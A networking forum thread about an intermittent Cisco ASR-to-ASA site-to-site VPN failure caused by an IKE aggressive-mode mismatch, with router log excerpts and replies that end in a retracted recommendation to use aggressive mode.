So I disable VPN aggressive mode on the ASR router, only main-mode is allowed. I have no idea how the ASA is configured. The site-2-site VPN is working fine "most of the time". Sometimes, application folks reported that network 192.168.1.0/24 can not communicate with network 10.0.1.0/24.
When the VPN tunnel is not working I am seeing this in the ASR log:
000927: Jan 8 02:47:20.535 gmt: %CRYPTO-5-IKMP_AG_MODE_DISABLED: Unable to initiate or respond to Aggressive Mode while disabled
000928: Jan 8 05:33:24.726 gmt: %CRYPTO-5-IKMP_AG_MODE_DISABLED: Unable to initiate or respond to Aggressive Mode while disabled
000929: Jan 8 10:04:25.026 gmt: %CRYPTO-5-IKMP_AG_MODE_DISABLED: Unable to initiate or respond to Aggressive Mode while disabled
000930: Jan 8 11:12:55.819 gmt: %CRYPTO-5-IKMP_AG_MODE_DISABLED: Unable to initiate or respond to Aggressive Mode while disabled
I know the Agressive-Mode on the ASA can be turned off with "crypto isakmp am-disable" but I do not control the ASA
Does this mean that the ASA, by default, enable Aggressive Mode? Without turning it off, will it cause issue with my site-2-site VPN because the ASR does not allow aggressive mode?
Yes, by default ASA uses the aggressive mode and you have to have the same mode on both ends.
I would recommend to use aggressive mode, unless you're going to use certificate-based authentication. I had that problem with remote VPN where I couldn't disable aggressive mode on ASA.
Disabling aggressive mode prevents Cisco VPN clients from using preshared key authentication to establish tunnels to the security appliance. However, they may use certificate-based authentication (that is, ASA or RSA) to establish tunnels.
1- I am not using remote access VPN (vpn clients) so I don't care about this.
2- I am not sure where you've been the past five years but using Aggressive Mode is NOT recommended. There are "known" vulnerabilities with Aggressive Mode. This is well documented. That's why Main-Mode is the recommended approach (3 packets for AM versus 6 packets for MM).
Am I wrong? I thought Aggressive Mode is the thing of the past especially when it comes to site-2-site VPN.
I know the Aggressive Mode is less secure and I know the difference between them. The reason I was recomending this was the preshared authentication issue which looks like doesn't apply for l2l VPN, just for remote one. My mistake.
If that's the case then you just need (or get the other company rather) to change mode on the ASA to main.